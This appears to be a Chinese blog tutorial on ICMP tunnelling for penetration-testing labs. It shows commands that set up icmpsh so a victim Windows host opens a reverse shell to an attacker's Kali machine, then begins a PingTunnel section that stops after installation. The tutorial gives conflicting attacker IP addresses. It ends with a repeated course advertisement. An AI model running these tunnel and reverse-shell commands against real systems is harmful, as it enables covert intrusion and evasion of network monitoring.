目录
1. ICMP隧道
1.1 icmpsh本地端口转发
实验环境:
kali(攻击机):192.168.8.48
Windows2012(受害机):192.168.8.18
1.1.1 下载与部署
kali(需要python2环境)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py
# 安装python2pip
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
pip install .
# 安装python-impacket类库
sysctl -w net.ipv4.icmp_echo_ignore_all=1
# 关闭icmp应答,0为开启
git clone https://github.com/bdamele/icmpsh.git
# 下载icmpsh
1.1.2 使用方法
kali
cd icmpsh
python icmpsh_m.py 192.168.8.35(攻击者IP) 192.168.8.18(受害者IP)
此时会等待回连。
Windows2012
icmpsh.exe -t 192.168.8.35(攻击者IP) -d 500 -b 30 -s 128
参数说明:
-t:攻击者IP,必选
-r:用于测试
-d:请求延迟(毫秒)
-o:响应超时(毫秒)
-b:空格数限制
-s:字节最大数据缓冲区大小(以字节为单位)
1.1.3 效果演示
执行后成功回连:
1.2 PingTunnel本地端口转发
实验环境:
kali(攻击机):192.168.8.48
CentOS7(边界服务器,跳板机):192.168.8.35
Windows2012(内网服务器):10.1.1.10
1.2.1 下载与部署
kali
方式一:直接安装
apt install ptunnel -y
方式二:官网下载安装
apt install flex bison -y
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/d391c964d3a9969ac98d9ea73202a6e0.png)
![img](https://img-blog.csdnimg.cn/img_convert/ae67eb6d44971c03d0faf7325aa00521.png)
![img](https://img-blog.csdnimg.cn/img_convert/d5ed0e8849080c3fc1a33befef7e97cc.png)
![img](https://img-blog.csdnimg.cn/img_convert/d721426b19f9f2b0d4a1125e593065eb.png)
![img](https://img-blog.csdnimg.cn/img_convert/0b97416e74d80fe8a98b5623f700b72a.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**